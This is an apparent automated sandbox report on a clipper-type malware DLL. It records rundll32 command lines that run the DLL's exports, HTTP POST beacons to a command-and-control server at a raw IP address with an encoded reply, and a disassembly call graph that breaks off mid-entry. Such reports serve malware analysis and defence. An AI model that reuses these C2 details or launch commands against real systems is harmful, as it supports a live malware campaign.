        Date: Fri, 13 Dec 2024 14:48:46 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        X-Powered-By: PHP/8.2.12
        Content-Length: 512
        Content-Type: text/html; charset=UTF-8
        Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
        Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.1149723185.81.68.148807760C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Dec 13, 2024 07:48:46.953031063 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: 185.81.68.148
        Content-Length: 5
        Cache-Control: no-cache
        Data Raw: 77 6c 74 3d 31
        Data Ascii: wlt=1
        Dec 13, 2024 07:48:48.330281019 CET711INHTTP/1.1 200 OK
        Date: Fri, 13 Dec 2024 14:48:47 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        X-Powered-By: PHP/8.2.12
        Content-Length: 512
        Content-Type: text/html; charset=UTF-8
        Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
        Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


        Click to jump to process

        Click to jump to process

        Click to jump to process

        Target ID:0
        Start time:01:48:35
        Start date:13/12/2024
        Path:C:\Windows\System32\loaddll32.exe
        Wow64 process (32bit):true
        Commandline:loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll"
        Imagebase:0x230000
        File size:126'464 bytes
        MD5 hash:51E6071F9CBA48E79F10C84515AAE618
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:1
        Start time:01:48:35
        Start date:13/12/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff68cce0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:01:48:35
        Start date:13/12/2024
        Path:C:\Windows\SysWOW64\cmd.exe
        Wow64 process (32bit):true
        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
        Imagebase:0xc30000
        File size:236'544 bytes
        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:01:48:35
        Start date:13/12/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Imagebase:0x240000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:5
        Start time:01:48:35
        Start date:13/12/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
        Imagebase:0x240000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:6
        Start time:01:48:38
        Start date:13/12/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Imagebase:0x240000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:7
        Start time:01:48:41
        Start date:13/12/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main
        Imagebase:0x240000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:9
        Start time:01:48:44
        Start date:13/12/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Imagebase:0x240000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:10
        Start time:01:48:44
        Start date:13/12/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Imagebase:0x240000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:11
        Start time:01:48:44
        Start date:13/12/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main
        Imagebase:0x240000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:false

        Reset < >

          Execution Graph

          Execution Coverage:3.6%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:2.1%
          Total number of Nodes:1156
          Total number of Limit Nodes:28
          execution_graph 9738 6e4e1640 9743 6e4e5d90 9738->9743 9740 6e4e1651 9759 6e4e6b05 9740->9759 9744 6e4e5dd4 9743->9744 9747 6e4e5dae __InternalCxxFrameHandler 9743->9747 9745 6e4e5ebe 9744->9745 9750 6e4e5e4d 9744->9750 9751 6e4e5e28 9744->9751 9780 6e4e1ec0 9745->9780 9747->9740 9748 6e4e5ec3 9803 6e4e1e20 9748->9803 9753 6e4e67d0 26 API calls 9750->9753 9756 6e4e5e39 __InternalCxxFrameHandler 9750->9756 9751->9748 9762 6e4e67d0 9751->9762 9753->9756 9755 6e4e5eb9 9775 6e4e99dc 9755->9775 9756->9755 9758 6e4e5ea0 9756->9758 9758->9740 9852 6e4e6ad8 9759->9852 9764 6e4e67d5 ___std_exception_copy 9762->9764 9763 6e4e67ef 9763->9756 9764->9763 9766 6e4e67f1 9764->9766 9818 6e4e9eaa 9764->9818 9767 6e4e1e20 Concurrency::cancel_current_task 9766->9767 9768 6e4e67fb 9766->9768 9809 6e4e7b0e 9767->9809 9770 6e4e7b0e Concurrency::cancel_current_task RaiseException 9768->9770 9772 6e4e70a6 9770->9772 9771 6e4e1e3c 9812 6e4e7a8c 9771->9812 9776 6e4e9968 ___std_exception_copy 25 API calls 9775->9776 9777 6e4e99eb 9776->9777 9778 6e4e99f9 ___std_exception_copy 11 API calls 9777->9778 9779 6e4e99f8 9778->9779 9841 6e4e6751 9780->9841 9804 6e4e1e2e Concurrency::cancel_current_task 9803->9804 9805 6e4e7b0e Concurrency::cancel_current_task RaiseException 9804->9805 9806 6e4e1e3c 9805->9806 9807 6e4e7a8c ___std_exception_copy 25 API calls 9806->9807 9808 6e4e1e63 9807->9808 9810 6e4e7b28 9809->9810 9811 6e4e7b55 RaiseException 9809->9811 9810->9811 9811->9771 9813 6e4e7a99 ___std_exception_copy 9812->9813 9817 6e4e1e63 9812->9817 9814 6e4e7ac6 9813->9814 9813->9817 9821 6e4eae42 9813->9821 9816 6e4eada7 ___std_exception_destroy 14 API calls 9814->9816 9816->9817 9817->9756 9830 6e4e9ed7 9818->9830 9822 6e4eae4f 9821->9822 9823 6e4eae5d 9821->9823 9822->9823 9828 6e4eae74 9822->9828 9824 6e4eb686 __dosmaperr 14 API calls 9823->9824 9825 6e4eae65 9824->9825 9826 6e4e99cc ___std_exception_copy 25 API calls 9825->9826 9827 6e4eae6f 9826->9827 9827->9814 9828->9827 9829 6e4eb686 __dosmaperr 14 API calls 9828->9829 9829->9825 9831 6e4e9ee3 CallCatchBlock 9830->9831 9836 6e4eb7d4 EnterCriticalSection 9831->9836 9833 6e4e9eee 9837 6e4e9f2a 9833->9837 9836->9833 9840 6e4eb81c LeaveCriticalSection 9837->9840 9839 6e4e9eb5 9839->9764 9840->9839 9846 6e4e66b0 9841->9846 9844 6e4e7b0e Concurrency::cancel_current_task RaiseException 9845 6e4e6770 9844->9845 9849 6e4e6660 9846->9849 9850 6e4e7a8c ___std_exception_copy 25 API calls 9849->9850 9851 6e4e668c 9850->9851 9851->9844 9853 6e4e6aee 9852->9853 9854 6e4e6ae7 9852->9854 9861 6e4eab9c 9853->9861 9858 6e4eab30 9854->9858 9857 6e4e165b 9859 6e4eab9c 28 API calls 9858->9859 9860 6e4eab42 9859->9860 9860->9857 9864 6e4ea8b3 9861->9864 9865 6e4ea8bf CallCatchBlock 9864->9865 9872 6e4eb7d4 EnterCriticalSection 9865->9872 9867 6e4ea8cd 9873 6e4ea92d 9867->9873 9869 6e4ea8da 9883 6e4ea902 9869->9883 9872->9867 9874 6e4ea949 9873->9874 9876 6e4ea9c0 __dosmaperr 9873->9876 9875 6e4ea9a0 9874->9875 9874->9876 9886 6e4ecd7b 9874->9886 9875->9876 9878 6e4ecd7b 28 API calls 9875->9878 9876->9869 9880 6e4ea9b6 9878->9880 9879 6e4ea996 9881 6e4eb90f _free 14 API calls 9879->9881 9882 6e4eb90f _free 14 API calls 9880->9882 9881->9875 9882->9876 9921 6e4eb81c LeaveCriticalSection 9883->9921 9885 6e4ea8eb 9885->9857 9887 6e4ecd88 9886->9887 9888 6e4ecda3 9886->9888 9887->9888 9889 6e4ecd94 9887->9889 9890 6e4ecdb2 9888->9890 9895 6e4eed96 9888->9895 9891 6e4eb686 __dosmaperr 14 API calls 9889->9891 9902 6e4eedc9 9890->9902 9894 6e4ecd99 __CreateFrameInfo 9891->9894 9894->9879 9896 6e4eedb6 HeapSize 9895->9896 9897 6e4eeda1 9895->9897 9896->9890 9898 6e4eb686 __dosmaperr 14 API calls 9897->9898 9899 6e4eeda6 9898->9899 9900 6e4e99cc ___std_exception_copy 25 API calls 9899->9900 9901 6e4eedb1 9900->9901 9901->9890 9903 6e4eedd6 9902->9903 9904 6e4eede1 9902->9904 9914 6e4eb833 9903->9914 9906 6e4eede9 9904->9906 9913 6e4eedf2 __dosmaperr 9904->9913 9910 6e4eb90f _free 14 API calls 9906->9910 9907 6e4eee1c HeapReAlloc 9909 6e4eedde 9907->9909 9907->9913 9908 6e4eedf7 9911 6e4eb686 __dosmaperr 14 API calls 9908->9911 9909->9894 9910->9909 9911->9909 9912 6e4e9eaa __dosmaperr 2 API calls 9912->9913 9913->9907 9913->9908 9913->9912 9915 6e4eb871 9914->9915 9919 6e4eb841 __dosmaperr 9914->9919 9917 6e4eb686 __dosmaperr 14 API calls 9915->9917 9916 6e4eb85c HeapAlloc 9918 6e4eb86f 9916->9918 9916->9919 9917->9918 9918->9909 9919->9915 9919->9916 9920 6e4e9eaa __dosmaperr 2 API calls 9919->9920 9920->9919 9921->9885 9932 6e4ea66c 9943 6e4ec836 9932->9943 9937 6e4ea689 9940 6e4eb90f _free 14 API calls 9937->9940 9941 6e4ea6b8 9940->9941 9942 6e4eb90f _free 14 API calls 9942->9937 9944 6e4ec83f 9943->9944 9945 6e4ea67e 9943->9945 9978 6e4eb389 9944->9978 9949 6e4eccf7 GetEnvironmentStringsW 9945->9949 9950 6e4ecd0e 9949->9950 9960 6e4ecd64 9949->9960 9953 6e4ecc09 ___scrt_uninitialize_crt WideCharToMultiByte 9950->9953 9951 6e4ecd6d FreeEnvironmentStringsW 9952 6e4ea683 9951->9952 9952->9937 9961 6e4ea6be 9952->9961 9954 6e4ecd27 9953->9954 9955 6e4eb833 15 API calls 9954->9955 9954->9960 9956 6e4ecd37 9955->9956 9957 6e4ecc09 ___scrt_uninitialize_crt WideCharToMultiByte 9956->9957 9958 6e4ecd4f 9956->9958 9957->9958 9959 6e4eb90f _free 14 API calls 9958->9959 9959->9960 9960->9951 9960->9952 9962 6e4ea6d3 9961->9962 9963 6e4eb8b2 __dosmaperr 14 API calls 9962->9963 9974 6e4ea6fa 9963->9974 9964 6e4ea75f 9965 6e4eb90f _free 14 API calls 9964->9965 9966 6e4ea694 9965->9966 9966->9942 9967 6e4eb8b2 __dosmaperr 14 API calls 9967->9974 9968 6e4ea761 10314 6e4ea78e 9968->10314 9970 6e4eae42 ___std_exception_copy 25 API calls 9970->9974 9972 6e4eb90f _free 14 API calls 9972->9964 9973 6e4ea781 9975 6e4e99f9 ___std_exception_copy 11 API calls 9973->9975 9974->9964 9974->9967 9974->9968 9974->9970 9974->9973 9976 6e4eb90f _free 14 API calls 9974->9976 9977 6e4ea78d 9975->9977 9976->9974 9979 6e4eb39a 9978->9979 9980 6e4eb394 9978->9980 9981 6e4ed09c __dosmaperr 6 API calls 9979->9981 10002 6e4eb3a0 9979->10002 9982 6e4ed05d __dosmaperr 6 API calls 9980->9982 9983 6e4eb3b4 9981->9983 9982->9979 9984 6e4eb8b2 __dosmaperr 14 API calls 9983->9984 9983->10002 9986 6e4eb3c4 9984->9986 9988 6e4eb3cc 9986->9988 9989 6e4eb3e1 9986->9989 9991 6e4ed09c __dosmaperr 6 API calls 9988->9991 9992 6e4ed09c __dosmaperr 6 API calls 9989->9992 9990 6e4eb419 10003 6e4ec682 9990->10003 9993 6e4eb3d8 9991->9993 9994 6e4eb3ed 9992->9994 9998 6e4eb90f _free 14 API calls 9993->9998 9995 6e4eb400 9994->9995 9996 6e4eb3f1 9994->9996 9997 6e4eb0ce __dosmaperr 14 API calls 9995->9997 9999 6e4ed09c __dosmaperr 6 API calls 9996->9999 10000 6e4eb40b 9997->10000 9998->10002 9999->9993 10001 6e4eb90f _free 14 API calls 10000->10001 10001->10002 10002->9990 10022 6e4eadfe 10002->10022 10111 6e4ec796 10003->10111 10008 6e4ec6ae 10008->9945 10009 6e4eb833 15 API calls 10010 6e4ec6bf 10009->10010 10017 6e4ec6f1 10010->10017 10129 6e4ec891 10010->10129 10012 6e4eb90f _free 14 API calls 10015 6e4ec6ff 10012->10015 10014 6e4ec6ec 10016 6e4eb686 __dosmaperr 14 API calls 10014->10016 10015->9945 10016->10017 10017->10012 10018 6e4ec733 10018->10017 10140 6e4ec31e 10018->10140 10019 6e4ec707 10019->10018 10021 6e4eb90f _free 14 API calls 10019->10021 10021->10018 10033 6e4ed590 10022->10033 10026 6e4eae18 IsProcessorFeaturePresent 10029 6e4eae24 10026->10029 10028 6e4eae0e 10028->10026 10032 6e4eae37 10028->10032 10030 6e4e9820 __CreateFrameInfo 8 API calls 10029->10030 10030->10032 10063 6e4ea34a 10032->10063 10066 6e4ed4c2 10033->10066 10036 6e4ed5d5 10037 6e4ed5e1 CallCatchBlock 10036->10037 10038 6e4eb423 __dosmaperr 14 API calls 10037->10038 10041 6e4ed60e __CreateFrameInfo 10037->10041 10044 6e4ed608 __CreateFrameInfo 10037->10044 10038->10044 10039 6e4ed655 10040 6e4eb686 __dosmaperr 14 API calls 10039->10040 10042 6e4ed65a 10040->10042 10043 6e4ed681 10041->10043 10077 6e4eb7d4 EnterCriticalSection 10041->10077 10045 6e4e99cc ___std_exception_copy 25 API calls 10042->10045 10049 6e4ed6c3 10043->10049 10050 6e4ed7b4 10043->10050 10060 6e4ed6f2 10043->10060 10044->10039 10044->10041 10047 6e4ed63f 10044->10047 10045->10047 10047->10028 10049->10060 10078 6e4eb2cc GetLastError 10049->10078 10051 6e4ed7bf 10050->10051 10109 6e4eb81c LeaveCriticalSection 10050->10109 10052 6e4ea34a __CreateFrameInfo 23 API calls 10051->10052 10055 6e4ed7c7 10052->10055 10057 6e4eb2cc _unexpected 37 API calls 10061 6e4ed747 10057->10061 10059 6e4eb2cc _unexpected 37 API calls 10059->10060 10105 6e4ed761 10060->10105 10061->10047 10062 6e4eb2cc _unexpected 37 API calls 10061->10062 10062->10047 10064 6e4ea1f0 __CreateFrameInfo 23 API calls 10063->10064 10065 6e4ea35b 10064->10065 10067 6e4ed4ce CallCatchBlock 10066->10067 10072 6e4eb7d4 EnterCriticalSection 10067->10072 10069 6e4ed4dc 10073 6e4ed51a 10069->10073 10072->10069 10076 6e4eb81c LeaveCriticalSection 10073->10076 10075 6e4eae03 10075->10028 10075->10036 10076->10075 10077->10043 10079 6e4eb2e3 10078->10079 10082 6e4eb2e9 10078->10082 10081 6e4ed05d __dosmaperr 6 API calls 10079->10081 10080 6e4ed09c __dosmaperr 6 API calls 10083 6e4eb307 10080->10083 10081->10082 10082->10080 10104 6e4eb2ef SetLastError 10082->10104 10084 6e4eb8b2 __dosmaperr 14 API calls 10083->10084 10083->10104 10086 6e4eb317 10084->10086 10087 6e4eb31f 10086->10087 10088 6e4eb336 10086->10088 10092 6e4ed09c __dosmaperr 6 API calls 10087->10092 10091 6e4ed09c __dosmaperr 6 API calls 10088->10091 10089 6e4eb37d 10089->10059 10090 6e4eb383 10093 6e4eadfe IsInExceptionSpec 35 API calls 10090->10093 10095 6e4eb342 10091->10095 10096 6e4eb32d 10092->10096 10094 6e4eb388 10093->10094 10097 6e4eb346 10095->10097 10098 6e4eb357 10095->10098 10101 6e4eb90f _free 14 API calls 10096->10101 10099 6e4ed09c __dosmaperr 6 API calls 10097->10099 10100 6e4eb0ce __dosmaperr 14 API calls 10098->10100 10099->10096 10102 6e4eb362 10100->10102 10101->10104 10103 6e4eb90f _free 14 API calls 10102->10103 10103->10104 10104->10089 10104->10090 10106 6e4ed767 10105->10106 10108 6e4ed738 10105->10108 10110 6e4eb81c LeaveCriticalSection 10106->10110 10108->10047 10108->10057 10108->10061 10109->10051 10110->10108 10112 6e4ec7a2 CallCatchBlock 10111->10112 10114 6e4ec7bc 10112->10114 10148 6e4eb7d4 EnterCriticalSection 10112->10148 10116 6e4ec695 10114->10116 10118 6e4eadfe IsInExceptionSpec 37 API calls 10114->10118 10115 6e4ec7f8 10149 6e4ec815 10115->10149 10122 6e4ec42c 10116->10122 10120 6e4ec835 10118->10120 10119 6e4ec7cc 10119->10115 10121 6e4eb90f _free 14 API calls 10119->10121 10121->10115 10153 6e4e9c9c 10122->10153 10125 6e4ec45f 10127 6e4ec476 10125->10127 10128 6e4ec464 GetACP 10125->10128 10126 6e4ec44d GetOEMCP 10126->10127 10127->10008 10127->10009 10128->10127 10130 6e4ec42c 39 API calls 10129->10130 10131 6e4ec8b1 10130->10131 10133 6e4ec8eb IsValidCodePage 10131->10133 10138 6e4ec927 __CreateFrameInfo 10131->10138 10135 6e4ec8fd 10133->10135 10133->10138 10134 6e4ec6e4 10134->10014 10134->10019 10136 6e4ec92c GetCPInfo 10135->10136 10139 6e4ec906 __CreateFrameInfo 10135->10139 10136->10138 10136->10139 10207 6e4e6791 10138->10207 10196 6e4ec502 10139->10196 10141 6e4ec32a CallCatchBlock 10140->10141 10288 6e4eb7d4 EnterCriticalSection 10141->10288 10143 6e4ec334 10289 6e4ec36b 10143->10289 10148->10119 10152 6e4eb81c LeaveCriticalSection 10149->10152 10151 6e4ec81c 10151->10114 10152->10151 10154 6e4e9cbc 10153->10154 10155 6e4e9cb3 10153->10155 10154->10155 10156 6e4eb2cc _unexpected 37 API calls 10154->10156 10155->10125 10155->10126 10157 6e4e9cdc 10156->10157 10161 6e4eb699 10157->10161 10162 6e4eb6ac 10161->10162 10163 6e4e9cf2 10161->10163 10162->10163 10169 6e4ee03c 10162->10169 10165 6e4eb6c6 10163->10165 10166 6e4eb6d9 10165->10166 10168 6e4eb6ee 10165->10168 10166->10168 10191 6e4ec87e 10166->10191 10168->10155 10170 6e4ee048 CallCatchBlock 10169->10170 10171 6e4eb2cc _unexpected 37 API calls 10170->10171 10172 6e4ee051 10171->10172 10174 6e4ee097 10172->10174 10182 6e4eb7d4 EnterCriticalSection 10172->10182 10174->10163 10175 6e4ee06f 10183 6e4ee0bd 10175->10183 10180 6e4eadfe IsInExceptionSpec 37 API calls 10181 6e4ee0bc 10180->10181 10182->10175 10184 6e4ee0cb __fassign 10183->10184 10186 6e4ee080 10183->10186 10185 6e4eddf0 __fassign 14 API calls 10184->10185 10184->10186 10185->10186 10187 6e4ee09c 10186->10187 10190 6e4eb81c LeaveCriticalSection 10187->10190 10189 6e4ee093 10189->10174 10189->10180 10190->10189 10192 6e4eb2cc _unexpected 37 API calls 10191->10192 10193 6e4ec888 10192->10193 10194 6e4ec796 __fassign 37 API calls 10193->10194 10195 6e4ec88e 10194->10195 10195->10168 10197 6e4ec52a GetCPInfo 10196->10197 10206 6e4ec5f3 10196->10206 10202 6e4ec542 10197->10202 10197->10206 10198 6e4e6791 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10199 6e4ec680 10198->10199 10199->10138 10214 6e4ee10d 10202->10214 10205 6e4eed3e 41 API calls 10205->10206 10206->10198 10208 6e4e679a IsProcessorFeaturePresent 10207->10208 10209 6e4e6799 10207->10209 10211 6e4e6b57 10208->10211 10209->10134 10287 6e4e6b1a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10211->10287 10213 6e4e6c3a 10213->10134 10215 6e4e9c9c __fassign 37 API calls 10214->10215 10216 6e4ee12d 10215->10216 10234 6e4ecb8d 10216->10234 10218 6e4ee1eb 10220 6e4e6791 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10218->10220 10219 6e4ee15a 10219->10218 10221 6e4eb833 15 API calls 10219->10221 10225 6e4ee180 __CreateFrameInfo 10219->10225 10222 6e4ec5aa 10220->10222 10221->10225 10229 6e4eed3e 10222->10229 10223 6e4ee1e5 10237 6e4ee210 10223->10237 10225->10223 10226 6e4ecb8d __fassign MultiByteToWideChar 10225->10226 10227 6e4ee1ce 10226->10227 10227->10223 10228 6e4ee1d5 GetStringTypeW 10227->10228 10228->10223 10230 6e4e9c9c __fassign 37 API calls 10229->10230 10231 6e4eed51 10230->10231 10241 6e4eeb54 10231->10241 10236 6e4ecb9e MultiByteToWideChar 10234->10236 10236->10219 10238 6e4ee21c 10237->10238 10240 6e4ee22d 10237->10240 10239 6e4eb90f _free 14 API calls 10238->10239 10238->10240 10239->10240 10240->10218 10242 6e4eeb6f 10241->10242 10243 6e4ecb8d __fassign MultiByteToWideChar 10242->10243 10246 6e4eebb3 10243->10246 10244 6e4eed18 10245 6e4e6791 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10244->10245 10247 6e4ec5cb 10245->10247 10246->10244 10249 6e4eb833 15 API calls 10246->10249 10253 6e4eebd8 10246->10253 10247->10205 10248 6e4eec7d 10252 6e4ee210 __freea 14 API calls 10248->10252 10249->10253 10250 6e4ecb8d __fassign MultiByteToWideChar 10251 6e4eec1e 10250->10251 10251->10248 10269 6e4ed129 10251->10269 10252->10244 10253->10248 10253->10250 10256 6e4eec8c 10258 6e4eb833 15 API calls 10256->10258 10262 6e4eec9e 10256->10262 10257 6e4eec54 10257->10248 10259 6e4ed129 6 API calls 10257->10259 10258->10262 10259->10248 10260 6e4eed09 10261 6e4ee210 __freea 14 API calls 10260->10261 10261->10248 10262->10260 10263 6e4ed129 6 API calls 10262->10263 10264 6e4eece6 10263->10264 10264->10260 10275 6e4ecc09 10264->10275 10266 6e4eed00 10266->10260 10267 6e4eed35 10266->10267 10268 6e4ee210 __freea 14 API calls 10267->10268 10268->10248 10278 6e4ece02 10269->10278 10273 6e4ed17a LCMapStringW 10274 6e4ed13a 10273->10274 10274->10248 10274->10256 10274->10257 10277 6e4ecc20 WideCharToMultiByte 10275->10277 10277->10266 10279 6e4ecefd __dosmaperr 5 API calls 10278->10279 10280 6e4ece18 10279->10280 10280->10274 10281 6e4ed186 10280->10281 10284 6e4ece1c 10281->10284 10283 6e4ed191 10283->10273 10285 6e4ecefd __dosmaperr 5 API calls 10284->10285 10286 6e4ece32 10285->10286 10286->10283 10287->10213 10288->10143 10299 6e4eca84 10289->10299 10291 6e4ec38d 10292 6e4eca84 25 API calls 10291->10292 10293 6e4ec3ac 10292->10293 10294 6e4ec341 10293->10294 10295 6e4eb90f _free 14 API calls 10293->10295 10296 6e4ec35f 10294->10296 10295->10294 10313 6e4eb81c LeaveCriticalSection 10296->10313 10298 6e4ec34d 10298->10017 10300 6e4eca95 10299->10300 10309 6e4eca91 __InternalCxxFrameHandler 10299->10309 10301 6e4eca9c 10300->10301 10304 6e4ecaaf __CreateFrameInfo 10300->10304 10302 6e4eb686 __dosmaperr 14 API calls 10301->10302 10303 6e4ecaa1 10302->10303 10305 6e4e99cc ___std_exception_copy 25 API calls 10303->10305 10306 6e4ecadd 10304->10306 10307 6e4ecae6 10304->10307 10304->10309 10305->10309 10308 6e4eb686 __dosmaperr 14 API calls 10306->10308 10307->10309 10311 6e4eb686 __dosmaperr 14 API calls 10307->10311 10310 6e4ecae2 10308->10310 10309->10291 10312 6e4e99cc 